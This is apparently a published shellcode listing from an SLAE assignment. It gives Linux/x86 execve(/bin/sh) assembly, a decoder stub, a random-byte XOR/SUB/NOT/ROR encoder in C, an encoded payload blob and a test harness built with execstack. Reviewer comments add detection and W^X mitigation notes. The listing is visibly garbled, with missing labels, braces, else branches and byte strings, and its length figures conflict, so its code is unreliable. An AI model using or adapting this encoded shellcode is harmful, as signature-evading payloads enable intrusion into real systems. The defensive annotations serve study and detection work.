Linux/x86 Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode

A small (114-byte) Linux/x86 random-byte encoder and XOR/SUB/NOT/ROR execve(/bin/sh) shellcode.

MD5 | 6821b8b561a61bc5d34076f52fd398bd

# Title: Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114)
# Author: Xenofon Vassilakopoulos
# Date: 2020-01-01
# Tested on: Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
# Architecture: i686 GNU/Linux
# Shellcode Length: 114 bytes
# SLAE-ID: SLAE - 1314
# Description: Linux/x86 execve(/bin/sh) shellcode with random-byte insertion and XOR/SUB/NOT/ROR encoding; the decoder stub reverses it with ROL/NOT/ADD/XOR and strips the inserted bytes before executing the payload

---------------------- execve-stack /bin/sh --------------------------------

; Stage 2: the payload the decoder hands control to -- execve("/bin//sh").
; This is the textbook 25-byte form (the encoder run further down reports
; "Shellcode Length 25"). It contains no 0x00 bytes, which is why the path is
; built from the two pushes "//sh" and "/bin" rather than a NUL-padded string.
; For detection purposes this sequence (push "//sh"/"/bin", mov al, 11, int 0x80)
; is one of the most heavily signatured byte patterns on 32-bit Linux; the
; encoder on this page exists precisely to hide it, so static rules should also
; look for the decoder stub that precedes it.
global _start
section .text
xor eax, eax            ; eax = 0; also serves as the NUL terminator pushed next
push eax
push 0x68732f2f         ; "//sh" (little-endian)
push 0x6e69622f         ; "/bin" -> stack now holds "/bin//sh\0"
mov ebx, esp            ; ebx = pathname
push eax
mov edx, esp            ; edx = envp -> NULL
push ebx
mov ecx, esp            ; ecx = argv -> { pathname, NULL }
mov al, 11              ; __NR_execve on 32-bit Linux
int 0x80

----------------------- Original Shellcode ---------------------------------


----------- Decoder ROL/NOT/ADD/XOR + Removing inserted random bytes -------

; Decoder stub (stage 1). NOTE(review): the labels this code branches to
; (call_shellcode, rotate, init, decode, decoder) are referenced but not
; defined anywhere in the listing as printed -- they were evidently dropped
; during extraction, so the loop boundaries below are inferred from the jumps
; and should be confirmed against the original source.
global _start

section .text

; jmp-short / call / pop: position-independent way to get the address of the
; trailing data into esi (the `call decoder` at the bottom pushes it).
; For defenders, this jmp/call/pop prologue followed by an in-place byte loop
; is one of the classic heuristics for a shellcode decoder stub.
jmp short call_shellcode
pop esi                 ; presumably the `decoder` label: esi -> EncodedShellcode
push esi                ; keep a copy of the start address for the second pass
xor ebx, ebx
xor ecx, ecx            ; cl = byte counter
xor edx, edx
mov dl, len             ; dl = length of the encoded blob (50 bytes)
;; apply the decoding scheme
; each step is the inverse of the encoder's XOR 0x2c / SUB 2 / NOT / rotate-4,
; applied in reverse order. The bytes are rewritten in place, so the page
; holding this code must be writable as well as executable -- a W^X policy
; (non-executable data, read-only text) breaks this stage before the payload
; is ever reached.
rol byte [esi], 4
not byte [esi]
add byte [esi], 2
xor byte [esi], 0x2c
inc esi
cmp cl, dl
je init                 ; all bytes processed -> second pass
inc cl
jmp short rotate        ; presumably back to the `rol` above (label dropped)

; second pass: remove the inserted random bytes by copying every other byte
; (stride 2, starting at offset 2) down over the odd positions
pop esi                 ; presumably the `init` label: esi -> start of the decoded blob
lea edi, [esi +1]       ; edi = destination, just after the first real byte
xor eax, eax
mov al, 1               ; al + 1 = source offset; advances by 2 per copy
xor ecx, ecx

cmp cl, dl
je EncodedShellcode     ; done -> jump into the compacted payload
mov bl, byte [esi + eax + 1]
mov byte [edi], bl
inc edi
inc cl
add al, 2
jmp short decode        ; presumably back to the `cmp cl, dl` above (label dropped)

call decoder            ; pushes the address of EncodedShellcode; the `pop esi` above retrieves it
; 50 bytes, matching "Encoded Shellcode Length 50" in the encoder run below.
; Because the encoder seeds rand() from the clock, a re-run produces a
; different blob; the stub above is the stable part for signature purposes.
EncodedShellcode: db 0x4e,0xc1,0x51,0x2f,0x58,0x3c,0xdb,0xac,0xef,0x82,0xef,0x1c,0x2a,0xd9,0xdb,0x90,0xdb,0x6b,0xef,0x61,0x3b,0x1c,0xcb,0x24,0xfb,0xd6,0xc5,0x50,0x23,0xfa,0x58,0x9c,0xc5,0xb1,0x33,0x97,0x28,0x31,0xc5,0xaa,0x43,0xf9,0x56,0xf4,0xad,0xc2,0x02,0x16,0x55,0xe3
len equ $-EncodedShellcode

--------- Encoder - Random Bytes Insertion + XOR/SUB/NOT/ROR ---------------

[email protected]:~/Documents/Assignment4$ gcc -o encoder encoder.c
[email protected]:~/Documents/Assignment4$ ./encoder



Shellcode Length 25

Decoded Shellcode:


Encoded shellcode


Encoded Shellcode Length 50

[email protected]:~/Documents/Assignment4$ cat encoder.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

// Encoding constants. They must stay in sync with the decoder stub, which
// undoes them with `add byte [esi], 2` and `xor byte [esi], 0x2c`.
#define DEC 0x2 // the value subtracted from every byte
#define XORVAL 0x2c // the value XORed with every byte

// execve stack shellcode /bin/sh
// NOTE(review): the byte-string literal that followed the backslash was
// dropped from this listing; it held the 25-byte execve-stack payload shown
// in assembly at the top of the page.
unsigned char shellcode[] = \

/*
 * Encoder entry point: prints the original shellcode, interleaves one random
 * byte after every real byte, then applies XOR 0x2c -> SUB 2 -> NOT -> rotate
 * by 4 to every byte of the doubled buffer and prints the result in the
 * `0x..,` form used by the decoder's `db` line.
 *
 * NOTE(review): the listing reached us without its brace lines, `else`
 * lines or the end of main(), so the comments below describe the code as
 * printed and cannot confirm where each loop body ends.
 * NOTE(review): `void main()` is not standard C; the entry point should be
 * `int main(void)`.
 */
void main()
int rot = 4; // rotation amount in bits (see the note on the rotate line below)
int o;
for (o=0; o<strlen(shellcode); o++) {
printf("\\x%02x", shellcode[o]);
// NOTE(review): sizeof yields size_t, so "%d" is a mismatched format
// specifier ("%zu"); the same applies to the strlen() argument at the end.
printf("\n\nShellcode Length %d\n",sizeof(shellcode)-1);
printf("\n\nDecoded Shellcode:\n\n");
// NOTE(review): `o` is not reset here; after the loop above it already
// equals strlen(shellcode), so as printed this loop runs zero times. The
// "for (i; ...)" loop near the end has the same problem.
for (o; o<strlen(shellcode); o++) {
printf("0x%02x,", shellcode[o]);
int i;
// NOTE(review): the (char*) cast is unnecessary in C and disagrees with the
// unsigned char* target; neither malloc() result is checked for NULL.
unsigned char *buffer = (char*)malloc(sizeof(shellcode)*2);
// Seeds the PRNG from the wall clock, so every run emits a different encoded
// blob. For defenders this means a file hash (such as the MD5 at the top of
// the page) identifies only this one sample; the unchanging decoder stub is
// the part worth signaturing.
srand((unsigned int)time(NULL));
unsigned char *shellcode2=(char*)malloc(sizeof(shellcode)*2);
// placeholder to copy the random bytes using rand
unsigned char shellcode3[] = "\xbb";
int l = 0;      // index into the original shellcode
int k = 0;      // parity of the current output position
int j;          // unused as printed
// random byte insertion into even location
// As printed, even 0-based positions receive a real byte and odd ones the
// random byte, which matches the decoder's stride-2 copy.
// NOTE(review): no `l++` is visible in this listing; if it is not in the
// dropped text, every even slot would receive shellcode[0].
for (i=0; i<(strlen(shellcode)*2); i++) {
// generate random bytes
// Any value 0x00-0xff can come out here; the encoded output is never
// checked for 0x00 bytes, which matters for the strlen() calls below.
buffer[i] = rand() & 0xff;
// copies the single random byte; equivalent to shellcode3[0] = buffer[i]
memcpy(&shellcode3[0],(unsigned char*)&buffer[i],sizeof(buffer[i]));
k = i % 2;
if (k == 0)
shellcode2[i] = shellcode[l];
// NOTE(review): no `else` is visible before this line; if none exists in the
// dropped text, this overwrites the real byte stored on the previous line.
shellcode2[i] = shellcode3[0];
// apply the encoding scheme
// NOTE(review): shellcode2 is never NUL-terminated and may legitimately
// contain 0x00 bytes, so strlen(shellcode2) here and in the two calls below
// is not a reliable length (it can stop early or read past the written
// bytes). The written length is 2*strlen(shellcode).
for (i=0; i<strlen(shellcode2); i++) {
// XOR every byte with 0x2c
shellcode2[i] = shellcode2[i] ^ XORVAL;
// subtract every byte by 2
shellcode2[i] = shellcode2[i] - DEC;
// one's complement negation
shellcode2[i] = ~shellcode2[i];
// perform the ROR method
// NOTE(review): sizeof(shellcode2[i]) is 1, so this is
// (x << rot) | (x >> (8 - rot)), i.e. a LEFT rotation once the result is
// truncated back to 8 bits on assignment. For rot == 4 a left and right
// rotation coincide, which is why the decoder's `rol byte [esi], 4` still
// inverts it; for any other rot the comment and the decoder would be wrong.
shellcode2[i] = (shellcode2[i] << rot) | (shellcode2[i] >> sizeof(shellcode2[i])*(8-rot));
// print encoded shellcode
printf("\nEncoded shellcode\n\n");
// NOTE(review): `i` is not reset, see the note on the earlier "for (o; ...)" loop.
for (i; i<strlen(shellcode2); i++) {
printf("0x%02x,", shellcode2[i]);
printf("\n\nEncoded Shellcode Length %d\n",strlen(shellcode2));

----------------------------------- Shellcode -------------------------------------

[email protected]:~/Documents/Assignment4$ gcc -fno-stack-protector -z execstack -o shellcode shellcode.c
[email protected]:~/Documents/Assignment4$ ./shellcode
Shellcode Length: 117
$ whoami

[email protected]:~/Documents/Assignment4$ cat shellcode.c
#include <stdio.h>
#include <string.h>

// NOTE(review): the byte-string literal that followed the backslash was
// dropped from this listing. Per the page it held the decoder stub followed
// by the 50 encoded bytes from the `db` line in the decoder section.
unsigned char code[] = \


/*
 * Test harness: prints the payload length, then reinterprets the byte array
 * `code` as a function. NOTE(review): the call through `ret` and the closing
 * brace are not visible in this listing (presumably dropped with the other
 * brace lines); as printed, main() only prints and returns.
 *
 * The session above reports "Shellcode Length: 117" while the page header
 * says 114 bytes; the two figures may come from different builds and cannot
 * be reconciled from this listing.
 *
 * From a mitigation standpoint this only runs because the build line above
 * disables the stack protector and passes -z execstack; on this 32-bit target
 * that has historically implied read-implies-exec for the whole process, which
 * is what lets a writable .data array execute (confirm for the target kernel).
 * Under a default NX / W^X build the jump into data faults, and the decoder's
 * in-place rewriting would additionally need the page to be writable.
 */
int main()
// NOTE(review): strlen returns size_t; "%d" is a mismatched specifier (%zu).
// strlen also stops at the first 0x00 byte, so it under-reports a payload that
// contains NUL bytes.
printf("Shellcode Length: %d\n", strlen(code));
// Data pointer cast to a function pointer: not portable C, and exactly the
// data-to-code transition that NX / W^X enforcement is designed to block.
int (*ret)() = (int(*)())code;
